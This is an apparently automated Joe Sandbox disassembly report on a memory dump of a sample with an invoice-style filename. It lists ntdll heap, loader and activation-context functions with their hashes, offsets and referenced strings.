                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                • API String ID: 0-1340214556
                                • Opcode ID: e3ea98bb0e94ddb10674bfcaaa107161411c7f3b73e0d107fc68e3302897737a
                                • Instruction ID: 31642b76e2eea80eb1d886ebeb049df4e3a0e18a819481860a53658af1063683
                                • Opcode Fuzzy Hash: e3ea98bb0e94ddb10674bfcaaa107161411c7f3b73e0d107fc68e3302897737a
                                • Instruction Fuzzy Hash: D851F575641784EFE712CBA4D864B9ABBF8FF05344F1500A4EA40CB693D774EA41CB51
                                Function 325015F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                Download Yara Rule
                                Strings
                                • minkernel\ntdll\ldrmap.c, xrefs: 3254A59A
                                • LdrpCompleteMapModule, xrefs: 3254A590
                                • Could not validate the crypto signature for DLL %wZ, xrefs: 3254A589
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                • API String ID: 0-1676968949
                                • Opcode ID: 99d1ddd9b6d88c3d2af5886ab59b6bcd8d48c78aa785a4b909f44315a2c624cf
                                • Instruction ID: d7d4087abcaf38ede43726c3400b95167f62f6325fdf399d535cfaf414efe070
                                • Opcode Fuzzy Hash: 99d1ddd9b6d88c3d2af5886ab59b6bcd8d48c78aa785a4b909f44315a2c624cf
                                • Instruction Fuzzy Hash: 1D5137796007409BFB11CBA8CE50B46BBE4EF40B58F548668F9519BAE1DF74EB40CB41
                                Function 3258DAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                Download Yara Rule
                                Strings
                                • HEAP: , xrefs: 3258DC1F
                                • HEAP[%wZ]: , xrefs: 3258DC12
                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3258DC32
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                • API String ID: 0-3815128232
                                • Opcode ID: a211354ebea305f93750ff5bc456b7d659a362e8d411452f9b95f83529837b5a
                                • Instruction ID: b543cc31a1086030c435de040048b769ae057435fc2ab30f3ca224dcf9cb7e6b
                                • Opcode Fuzzy Hash: a211354ebea305f93750ff5bc456b7d659a362e8d411452f9b95f83529837b5a
                                • Instruction Fuzzy Hash: BB51037B3022508AF758CE39C440772B7E1EB4528AF508C9AE4C1CB281DAB5DA47DF21
                                Function 324E1B04 Relevance: 3.9, Strings: 3, Instructions: 148COMMON
                                Download Yara Rule
                                Strings
                                • HEAP: , xrefs: 3253FB58
                                • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 3253FB63
                                • HEAP[%wZ]: , xrefs: 3253FB4B
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                • API String ID: 0-1596344177
                                • Opcode ID: 8bcf81f4e4c4870dc03d4b100a25dbcb045dd3547f1637e91995985de6690d64
                                • Instruction ID: 1f2aaac2075fad5dafa366d65a054226889817b84a3e569345e8251d264914f6
                                • Opcode Fuzzy Hash: 8bcf81f4e4c4870dc03d4b100a25dbcb045dd3547f1637e91995985de6690d64
                                • Instruction Fuzzy Hash: 6B51AC74A00215DFEB08CF68C490BA9FBB1FF44715F558199D8599B242DB70ED42CB90
                                Function 324D758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                • API String ID: 0-1151232445
                                • Opcode ID: 5065d1e68f79c85505a6f41944c334b2cf099fbe889572709bb658b2d149f4da
                                • Instruction ID: 169a033e8ae564761d88ea1c2dcbb6e431d25329358760a2008f8100788e6109
                                • Opcode Fuzzy Hash: 5065d1e68f79c85505a6f41944c334b2cf099fbe889572709bb658b2d149f4da
                                • Instruction Fuzzy Hash: 0D4133BD2013808FFB1ACF18C1A07A97BE49F01798F5484A9DA85CB643EE74D9C6CB11
                                Function 325116CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                Download Yara Rule
                                Strings
                                • LdrpAllocateTls, xrefs: 32551B40
                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 32551B39
                                • minkernel\ntdll\ldrtls.c, xrefs: 32551B4A
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                • API String ID: 0-4274184382
                                • Opcode ID: acfe8a282e73dd1b2f5a7ea925c97b3ea77d9e2410696e5250bf0fa62c7b984e
                                • Instruction ID: f0dff0d0632782dae6fd9d6883dc73735e75dd11a23360f5ef70d3f8f253327c
                                • Opcode Fuzzy Hash: acfe8a282e73dd1b2f5a7ea925c97b3ea77d9e2410696e5250bf0fa62c7b984e
                                • Instruction Fuzzy Hash: 2B419DB5E01605AFEB05CFA8C840BADBBF1FF88705F508559E406A7310EB75AA41CFA0
                                Function 32595180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-964947082
                                • Opcode ID: 93525407c0a5552d1138c1f5d2e4e2de7c59ca7314914d87a4d406eb6ae11a64
                                • Instruction ID: b940ef357c9062b53fab858fd105ce5b26f7e76fbe9c765f6fd9f2692d05f92c
                                • Opcode Fuzzy Hash: 93525407c0a5552d1138c1f5d2e4e2de7c59ca7314914d87a4d406eb6ae11a64
                                • Instruction Fuzzy Hash: CA41F5B5A02344AFDB10EF55D990FEA7BA8EF44304F50446AF901DB241CA70CB99CB50
                                Function 325133A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                Download Yara Rule
                                Strings
                                • SXS: %s() passed the empty activation context data, xrefs: 325529FE
                                • Actx , xrefs: 325133AC
                                • RtlCreateActivationContext, xrefs: 325529F9
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                • API String ID: 0-859632880
                                • Opcode ID: 1337f0de5b7b9501b5e7e68ecb475835e8e0f408a15534eef144a316bab93a8f
                                • Instruction ID: aeba2613b3b5199846081e09b72a7088a91568a245376e8db5139b829f640bbd
                                • Opcode Fuzzy Hash: 1337f0de5b7b9501b5e7e68ecb475835e8e0f408a15534eef144a316bab93a8f
                                • Instruction Fuzzy Hash: 8D312432600301AFFF16CF58D895B9A7BA4EB98714F51446AFD05DF241DBB1EA81CB90
                                Function 3256B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                Download Yara Rule
                                Strings
                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3256B632
                                • @, xrefs: 3256B670
                                • GlobalFlag, xrefs: 3256B68F
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                • API String ID: 0-4192008846
                                • Opcode ID: 2b1b72c690b1dd0afeda88c8396f0d040650df328895566e6af82f4c53a689a1
                                • Instruction ID: 9e928f4bb05a710f3a574047c26cc54aaa7b74ddd17fc9217ad5101614e6e6df
                                • Opcode Fuzzy Hash: 2b1b72c690b1dd0afeda88c8396f0d040650df328895566e6af82f4c53a689a1
                                • Instruction Fuzzy Hash: DC313CB5D00219AFEB00EFA4DD80AEEBBB8EF44748F501469E605F7190DB749B04CBA4
                                Function 325813B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                • API String ID: 0-1050206962
                                • Opcode ID: d76383acfde7750cfb1e068852b42964db91cffa167affd91472ad36864f7533
                                • Instruction ID: 0a81b62eece80056212402280994331f5f886c2ba5e8b0eda95fc2cf1ffb4be1
                                • Opcode Fuzzy Hash: d76383acfde7750cfb1e068852b42964db91cffa167affd91472ad36864f7533
                                • Instruction Fuzzy Hash: D5318E76D0021DBFEB01CF94CC84EAEBBBDEB44754F414465EA00B7260D7B59E048BA0
                                Function 32511607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                Download Yara Rule
                                Strings
                                • DLL "%wZ" has TLS information at %p, xrefs: 32551A40
                                • minkernel\ntdll\ldrtls.c, xrefs: 32551A51
                                • LdrpInitializeTls, xrefs: 32551A47
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                • API String ID: 0-931879808
                                • Opcode ID: 7e1f59dc8f6b1845648211eeea50f58b2572324fa1c83d85178041452eee0e57
                                • Instruction ID: 4c935f7d2b25a0959ff8a7aa52034130c4644f217cc083d924fe66189884c80b
                                • Opcode Fuzzy Hash: 7e1f59dc8f6b1845648211eeea50f58b2572324fa1c83d85178041452eee0e57
                                • Instruction Fuzzy Hash: 33310731A40200FBFB148F58C984F9A7BB8AB40B55F548899F901F7590EB70BF41CBA0
                                Function 324D74B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: RtlValidateHeap
                                • API String ID: 3446177414-1797218451
                                • Opcode ID: d9e959b9845f7206f0d8ba2a8a9592b3f21722f063c1209e162a94999ac44dbc
                                • Instruction ID: 706418e40d30fd71b0b1334bf3793a3a7120e15d4566a64b676abd2505a21d7e
                                • Opcode Fuzzy Hash: d9e959b9845f7206f0d8ba2a8a9592b3f21722f063c1209e162a94999ac44dbc
                                • Instruction Fuzzy Hash: AC41477AA02385DFDB03CFA4C5A07ADBBB2BF80354F448658D9519B681CB349A41DB91
                                Function 3258705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: kLsE
                                • API String ID: 3446177414-3058123920
                                • Opcode ID: 4d15652a8d0313a7b9c4fa9e686627d7611fce3e6baa8830c9dd44852fc3cdd9
                                • Instruction ID: aab49cb62cda811ae559744bf2f5cbdcd83e8dd8c08931d4b0cba066f806b6ae
                                • Opcode Fuzzy Hash: 4d15652a8d0313a7b9c4fa9e686627d7611fce3e6baa8830c9dd44852fc3cdd9
                                • Instruction Fuzzy Hash: E5412A79A8336186E711AF64E8857793F90EB40769F500919FC51EA1C1CBF447C3CBA1
                                Function 324F52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@
                                • API String ID: 0-149943524
                                • Opcode ID: aec1c059ae74620476acae5f4b06e54b0ea9bfb4c91a697a1f19881c7fd0ab25
                                • Instruction ID: 56ed2d1313cd327da35c45f2ae719a2cf6a99148a708f4677b52a7b7fee3a636
                                • Opcode Fuzzy Hash: aec1c059ae74620476acae5f4b06e54b0ea9bfb4c91a697a1f19881c7fd0ab25
                                • Instruction Fuzzy Hash: BB32ADB8508351ABE724CF15C480B2EB7F1EFC4B48F50491EF9959B290EB76C985CB92
                                Function 324E5702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 9eaee5b2dd2ab972593e33e94e07542d1eff0c2ce60368254aa7d6fa5c436113
                                • Instruction ID: 3a9d8a7d98c0f96d9b11c8e837eddd1317b99ab85caf991e28b7bb192de1aa37
                                • Opcode Fuzzy Hash: 9eaee5b2dd2ab972593e33e94e07542d1eff0c2ce60368254aa7d6fa5c436113
                                • Instruction Fuzzy Hash: C731AE35601B06EFE7599F60CA80B89FBA5FF84395F405029E90297A50DBB0E971CBD0
                                Function 32561ACB Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$AddD
                                • API String ID: 0-2525844869
                                • Opcode ID: 41bf7d5a2d69f45a3f3ba45ef7b3a3628e6752cf446762c9b64df21c32afa6f6
                                • Instruction ID: 6b9670a6a79bad03490d68e041399dcd017117c8bfa127c1261dd6951cd893b9
                                • Opcode Fuzzy Hash: 41bf7d5a2d69f45a3f3ba45ef7b3a3628e6752cf446762c9b64df21c32afa6f6
                                • Instruction Fuzzy Hash: 19A15DB5504344AFE314CF54C845BBBBBE9FB84709F509A2EF59486290E7B0EA44CB52
                                Function 324FF720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$$
                                • API String ID: 3446177414-233714265
                                • Opcode ID: 71ab0551dd3886b3e83d2185a3d291c04623f9097655a9e70bba17a454d7925c
                                • Instruction ID: 11f451f7961f3511b35c34ee073dc558a5004f4cfaf675bebb75af9413504d00
                                • Opcode Fuzzy Hash: 71ab0551dd3886b3e83d2185a3d291c04623f9097655a9e70bba17a454d7925c
                                • Instruction Fuzzy Hash: CB61BD75E00749EBEB20CFA4C580B9DB7B1FF84308F51446DD915AB680DBB6AA81CB90
                                Function 325735BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                • API String ID: 0-118005554
                                • Opcode ID: bc139f2cdb94d9061eee6d8b9f643b44978b432ecdebc6056b58509003baa0d4
                                • Instruction ID: cd213df727f4d96cb968d445289d66b18b800ed612d15154f3320392756a4568
                                • Opcode Fuzzy Hash: bc139f2cdb94d9061eee6d8b9f643b44978b432ecdebc6056b58509003baa0d4
                                • Instruction Fuzzy Hash: 3B31AD76248781AFD301CF68D944B2ABBE4EF95768F40086DF894CB390EB71DA05CB52
                                Function 3251329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: .Local\$@
                                • API String ID: 0-380025441
                                • Opcode ID: 72c936d7e1df93496258d12d84fff468dec18ab1edc16e84f6c2ee19aa1627dc
                                • Instruction ID: f92f940c2c7a06843ac1f73775a0ffa9df1e1725ff6633fda32380765c1ff8af
                                • Opcode Fuzzy Hash: 72c936d7e1df93496258d12d84fff468dec18ab1edc16e84f6c2ee19aa1627dc
                                • Instruction Fuzzy Hash: A33184B6518345AFE711CF28C590A5BBBE8EBD4754F40092EF99483250EB31EE44CB96
                                Function 325134B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                Download Yara Rule
                                Strings
                                • RtlpInitializeAssemblyStorageMap, xrefs: 32552A90
                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 32552A95
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                • API String ID: 0-2653619699
                                • Opcode ID: 3d58f89939e3053dc72a548b0771efb1c7dab476e54ca45957019f5b12d0e1db
                                • Instruction ID: b724ce927c7e5462b2a5526c058857aa40cc47d589bdec591b0dce2b01a87d23
                                • Opcode Fuzzy Hash: 3d58f89939e3053dc72a548b0771efb1c7dab476e54ca45957019f5b12d0e1db
                                • Instruction Fuzzy Hash: 2A112CB5B00214BBFB158A5DCD46F5B77AD9B94B58F2480697904DB344EAF4DF00C790
                                Function 3250B2C0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @[]2@[]2
                                • API String ID: 0-983809011
                                • Opcode ID: 64d1fa7207e7b71003c9ff6682c32f9ed0d1430c569380cadceb3ccda2fb29ce
                                • Instruction ID: 4aa6af5f04395f015935bbbafb13233339d3f274379150ca79b84be2992f7893
                                • Opcode Fuzzy Hash: 64d1fa7207e7b71003c9ff6682c32f9ed0d1430c569380cadceb3ccda2fb29ce
                                • Instruction Fuzzy Hash: EF32AFB5E01219DFDB14CF98DC90BAEBBB1FF94758F544029E805AB391EB359A01CB90
                                Function 325B31E1 Relevance: 1.8, APIs: 1, Instructions: 281COMMON
                                Download Yara Rule
                                APIs
                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 325B3356
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
